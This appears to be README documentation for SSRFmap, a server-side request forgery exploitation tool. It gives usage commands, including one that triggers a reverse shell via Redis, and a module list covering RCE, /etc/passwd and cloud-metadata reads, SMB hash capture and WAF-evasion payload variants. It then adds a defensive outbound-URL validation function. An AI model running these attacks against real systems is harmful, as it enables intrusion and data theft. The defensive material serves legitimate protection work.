SSRFmap - Automatic SSRF Fuzzer And Exploitation Tool


SSRF is frequently used to leverage actions on other services; this framework aims to find and exploit these services easily. SSRFmap takes a Burp request file as input and a parameter to fuzz.

Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on their behalf.

Guide / RTFM
Basic install from the GitHub repository.

git clone https://github.com/swisskyrepo/SSRFmap
cd SSRFmap/
python3 ssrfmap.py

usage: ssrfmap.py [-h] [-r REQFILE] [-p PARAM] [-m MODULES] [--lhost LHOST] [--lport LPORT] [--level LEVEL]

optional arguments:
  -h, --help       show this help message and exit
  -r REQFILE       SSRF Request file
  -p PARAM         SSRF Parameter to target
  -m MODULES       SSRF Modules to enable
  -l HANDLER       Start a handler for a reverse shell
  --lhost LHOST    LHOST reverse shell
  --lport LPORT    LPORT reverse shell
  --level [LEVEL]  Level of test to perform (1-5, default: 1)
The default way to use this script is the following.

# Launch a portscan on localhost and read default files
python ssrfmap.py -r data/request.txt -p url -m readfiles,portscan

# Triggering a reverse shell on a Redis
python ssrfmap.py -r data/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242

# -l create a listener for a reverse shell on the specified port
# --lhost and --lport work like in Metasploit, these values are used to create a reverse shell payload
# --level : ability to tweak payloads in order to bypass some IDS/WAF. e.g: 127.0.0.1 -> [::] -> 0000: -> ...
A quick way to test the framework is with the data/example.py SSRF service.

FLASK_APP=data/example.py flask run &
python ssrfmap.py -r data/request.txt -p url -m readfiles

Modules
The following modules are already implemented and can be used with the -m argument.

Name          Description
fastcgi       FastCGI RCE
redis         Redis RCE
github        Github Enterprise RCE < 2.8.7
zabbix        Zabbix RCE
mysql         MySQL Command execution
docker        Docker Infoleaks via API
smtp          SMTP send mail
portscan      Scan ports for the host
networkscan   HTTP Ping sweep over the network
readfiles     Read files such as /etc/passwd
alibaba       Read files from the provider (e.g: meta-data, user-data)
aws           Read files from the provider (e.g: meta-data, user-data)
digitalocean  Read files from the provider (e.g: meta-data, user-data)
socksproxy    SOCKS4 Proxy
smbhash       Force an SMB authentication via a UNC Path
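On the defending side, the --level payload variants above (127.0.0.1, [::], ...) and the provider modules that read 169.254.169.254 metadata all rely on a server-side fetcher that accepts any host it is given. The following added example (not SSRFmap code; the function names `is_forbidden_address`, `resolve_host` and `check_outbound_url` are assumptions) shows an outbound-URL check that resolves the host the same way the HTTP client would and refuses loopback, private, link-local, unspecified and IPv4-mapped addresses, as well as non-HTTP schemes.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}   # no gopher://, file://, dict:// etc.


def is_forbidden_address(addr: str) -> bool:
    """True for any address a server-side fetch must never reach on a user's behalf:
    loopback, RFC 1918, link-local (169.254.169.254 metadata), unspecified (0.0.0.0, ::),
    multicast and reserved space, including IPv4-mapped IPv6 spellings."""
    ip = ipaddress.ip_address(addr)
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped                    # ::ffff:127.0.0.1 is still loopback
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_unspecified or ip.is_multicast or ip.is_reserved)


def resolve_host(host: str, port: int) -> list[str]:
    """Resolve with the same routine the HTTP client uses, so alternate literal
    spellings (decimal, hex, shortened IPv6) collapse to the address really dialed."""
    infos = socket.getaddrinfo(host, port, proto=socket.IPPROTO_TCP)
    return sorted({info[4][0] for info in infos})


def check_outbound_url(url: str, resolver=resolve_host) -> tuple[bool, str]:
    """Return (allowed, reason). `resolver` is injectable so the check is testable offline."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme not allowed: {parts.scheme!r}"
    try:
        host, port = parts.hostname, parts.port
    except ValueError as exc:                  # e.g. non-numeric port
        return False, f"malformed authority: {exc}"
    if not host:
        return False, "missing host"
    port = port or (443 if parts.scheme.lower() == "https" else 80)
    try:
        addrs = resolver(host, port)
    except OSError as exc:                     # socket.gaierror is an OSError
        return False, f"resolution failed: {exc}"
    for addr in addrs:
        if is_forbidden_address(addr):
            return False, f"{host} resolves to forbidden address {addr}"
    # Caveat: the real fetch must connect to one of `addrs`, not re-resolve the
    # name, or a DNS rebinding answer can point the second lookup somewhere else.
    return True, f"{host} -> {', '.join(addrs)}"
```

A hostname that resolves to a mix of public and internal addresses is rejected outright, since the client may pick either one.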

Inspired by